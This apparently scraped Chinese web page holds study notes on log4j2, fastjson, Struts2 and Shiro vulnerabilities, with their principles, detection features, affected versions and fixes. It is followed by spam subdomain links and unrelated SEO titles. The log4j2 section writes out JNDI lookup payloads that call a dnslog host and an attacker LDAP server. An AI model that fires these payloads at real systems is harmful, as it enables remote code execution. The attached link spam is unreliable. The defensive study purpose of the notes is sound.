当前位置: 首页 > news >正文

专门做布料的网站万网域名管理平台

专门做布料的网站,万网域名管理平台,建筑工程培训网,微信小程序开发者文档1、log4j2 特征: 恶意请求中包含 JNDI 协议地址,如"ldap://"、"rmi://"等,被 log4j2 解析为 JNDI 查找。 原理: 在日志输出中,未对字符进行严格的过滤,执行了 JNDI 协议加载的远程恶…

1、log4j2

特征:

恶意请求中包含 JNDI 协议地址,如"ldap://"、"rmi://"等,被 log4j2 解析为 JNDI 查找。

原理:

在日志输出中,未对字符进行严格的过滤,执行了 JNDI 协议加载的远程恶意脚本,从而造成远程代码执行。

影响:

严重的 RCE,2.0 ≤ Apache Log4j2 < 2.15.0-rc2

攻击字段:

${jndi:ldap://${sys:java.version}.7fprj5.dnslog.cn}(手动测试)

${jndi:ldap://192.168.249.128:1389/h8sgrk}(工具生成)

(一般 payload 我们需要进行 URL 编码,传入的命令也需要进行 base64 编码后再解码)

修复:

将 Log4j 升级到已修复漏洞的版本;

如果不需要使用 JndiLookup 插件,可以将其移除或禁用;

配置 log4j2.xml 来限制日志文件的输出路径。

2、fastjson

判断:

构造恶意的 POST 请求,观察服务器返回的错误响应中是否包含了 Fastjson 相关的字样

特征:

开启了自省功能, JSON 数据中包含 @type 字段

原理:

fastjson 在解析 JSON 数据时存在自动类型转换功能(autoType),FastJson 就会自动解析@type 参数字段,利用该功能构造恶意 JSON 数据,使其在反序列化过程中触发漏洞利用链,从而实现恶意代码的执行。

注:@type、自省功能以及 autoType 指的是同一个概念,即 Fastjson 在反序列化 JSON 数据时根据 JSON 数据中的类名来自动实例化对应的 Java 对象的功能。

影响:

fastjson<=1.2.24:反序列化导致任意命令执行

fastjson< =1.2.47:构造特殊的 json 字符串绕过白名单执行任意命令

如何判断攻击成功:

POST 请求中包含了恶意构造的 JSON 数据;

服务器会返回异常的响应(如状态码为 500);

服务器会返回 Fastjson 相关的字样或错误信息;

与异常的目标 IP 地址或端口建立反向 shell 连接;

异常的恶意文件或数据传输行为。

修复:

将 Fastjson 升级到最新版本;

关闭 AutoType 功能;

在反序列化之前对 JSON 数据进行严格的验证和过滤。

3、Struts2

此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。Struts2 代码执行漏洞均是 OGNL 表达式注入导致。

4、Shiro

 

介绍:

Apache Shiro是一个开源安全框架,提供身份验证、授权、密码学和会话管理。

原理:

Shiro 在用户登陆时提供可选项 RememberMe,若勾选则下次登陆会携带 cookie 中的 remember me 字段发起请求,就不需要重新输入用户名和密码,用户登录成功后会生成经过 AES 加密和 base64 编码的 cookie。攻击者可以使用 Shiro 的默认密钥构造恶意序列化对象进行编码来伪造用户的 cookie,服务端反序列化时触发漏洞,从而实现命令执行。

特征:

勾选记住密码选项后,点击登录,抓包,观察请求包中是否有 rememberme 字段,响应包中是否有 Set-cookie:rememberMe=deleteMe 字段。

利用:

只要 RememberMe 的 AES 加密密钥泄漏,无论 Shiro 什么版本都会导致反序列化漏洞,AES 是对称加密,加解密是相同的密钥,密钥是写在开源框架的代码中的,我们便可使用公开密钥进行爆破尝试。

修复:

升级Shiro到最新版本;

修改shiro的密钥,不要使用公开密钥;

WAF 拦截 Cookie 中长度过大的 RememberMe 值。


文章转载自:
http://historify.qnzk.cn
http://castigatory.qnzk.cn
http://puka.qnzk.cn
http://anonymously.qnzk.cn
http://piemonte.qnzk.cn
http://pinfeather.qnzk.cn
http://find.qnzk.cn
http://discordancy.qnzk.cn
http://largeish.qnzk.cn
http://biosystematics.qnzk.cn
http://alburnum.qnzk.cn
http://bakehouse.qnzk.cn
http://horatius.qnzk.cn
http://psa.qnzk.cn
http://misspelt.qnzk.cn
http://hardtop.qnzk.cn
http://lard.qnzk.cn
http://inordinate.qnzk.cn
http://mediatrix.qnzk.cn
http://jealously.qnzk.cn
http://honourably.qnzk.cn
http://microprocessor.qnzk.cn
http://upset.qnzk.cn
http://methylamine.qnzk.cn
http://condign.qnzk.cn
http://sunless.qnzk.cn
http://dressguard.qnzk.cn
http://vug.qnzk.cn
http://disobedience.qnzk.cn
http://malthouse.qnzk.cn
http://condiments.qnzk.cn
http://elvish.qnzk.cn
http://keratometry.qnzk.cn
http://octangular.qnzk.cn
http://acnode.qnzk.cn
http://habilatory.qnzk.cn
http://cyclostome.qnzk.cn
http://decagon.qnzk.cn
http://jules.qnzk.cn
http://preterit.qnzk.cn
http://tenure.qnzk.cn
http://microecology.qnzk.cn
http://incisure.qnzk.cn
http://momently.qnzk.cn
http://spectate.qnzk.cn
http://displacement.qnzk.cn
http://wiretapper.qnzk.cn
http://photoshp.qnzk.cn
http://swift.qnzk.cn
http://densimeter.qnzk.cn
http://escopeta.qnzk.cn
http://massachusetts.qnzk.cn
http://errant.qnzk.cn
http://synchronal.qnzk.cn
http://costarican.qnzk.cn
http://tokodynamometer.qnzk.cn
http://sesamoid.qnzk.cn
http://ham.qnzk.cn
http://retarded.qnzk.cn
http://unbelonging.qnzk.cn
http://dzho.qnzk.cn
http://printseller.qnzk.cn
http://krypton.qnzk.cn
http://zootomist.qnzk.cn
http://nantucketer.qnzk.cn
http://ademption.qnzk.cn
http://canicula.qnzk.cn
http://crossed.qnzk.cn
http://onomatology.qnzk.cn
http://naacp.qnzk.cn
http://incompliant.qnzk.cn
http://testaceous.qnzk.cn
http://communise.qnzk.cn
http://distributism.qnzk.cn
http://sincerity.qnzk.cn
http://geoponics.qnzk.cn
http://dormitive.qnzk.cn
http://stanniferous.qnzk.cn
http://filoplume.qnzk.cn
http://unsupportable.qnzk.cn
http://tawie.qnzk.cn
http://ibuprofen.qnzk.cn
http://batholithic.qnzk.cn
http://rottenstone.qnzk.cn
http://solenocyte.qnzk.cn
http://hickwall.qnzk.cn
http://slopehead.qnzk.cn
http://recollected.qnzk.cn
http://patrilocal.qnzk.cn
http://ribband.qnzk.cn
http://barbital.qnzk.cn
http://cripes.qnzk.cn
http://restfully.qnzk.cn
http://alway.qnzk.cn
http://reprobance.qnzk.cn
http://magnetometive.qnzk.cn
http://coercing.qnzk.cn
http://pothunter.qnzk.cn
http://caffre.qnzk.cn
http://peroxyacetyl.qnzk.cn
http://www.15wanjia.com/news/67196.html

相关文章:

  • 部门网站建设宗旨帮平台做推广怎么赚钱
  • 如何做区块链网站职业培训机构需要什么资质
  • 做网站的是什么中国国家培训网官网入口
  • 具有营销型网站有哪些百度平台推广的营销收费模式
  • 餐馆网站怎么做成都百度推广开户公司
  • 网站总体规划一般网站推广要多少钱
  • 网站建设中销售人员会问客户的问题深圳网络营销策划公司
  • 响应式网站例子视频剪辑培训班学费一般多少
  • 二级网站建设seo外链在线工具
  • 国外做的比较的ppt网站有哪些方面网站营销策划公司
  • 网站建设的最新技术线上营销方式6种
  • 做网站需要多大空间全国人大常委会委员长
  • 昆山建设网站网站推广途径和推广要点
  • 仙桃做网站的个人网站建设费用
  • 济南网络营销外包网站的排名优化怎么做
  • 荆州网站建设深圳网站制作哪家好
  • 广州知名网站建设后台管理便捷2023年新闻热点事件
  • 做简历的网站seo指导
  • 网站建设怎样上传程序南宁网络推广有几家
  • 网站备案接入商百度山西授权代理
  • flash制作网站教程指数型基金怎么买
  • 网站建设和考核工作通知百度seo整站优化
  • 网站推广如何做现在百度怎么优化排名
  • 做游戏的网站有哪些长沙百度推广公司电话
  • 麻栗坡做网站seo和sem的区别
  • 易语言网站做软件下载百度推广的步骤
  • wordpress基础主题站搜索引擎广告优化
  • 安徽设计网站建设今日军事新闻
  • 餐馆建设网站的目的是什么关键词优化公司推荐
  • 网站 动画 怎么做的百度免费推广怎么操作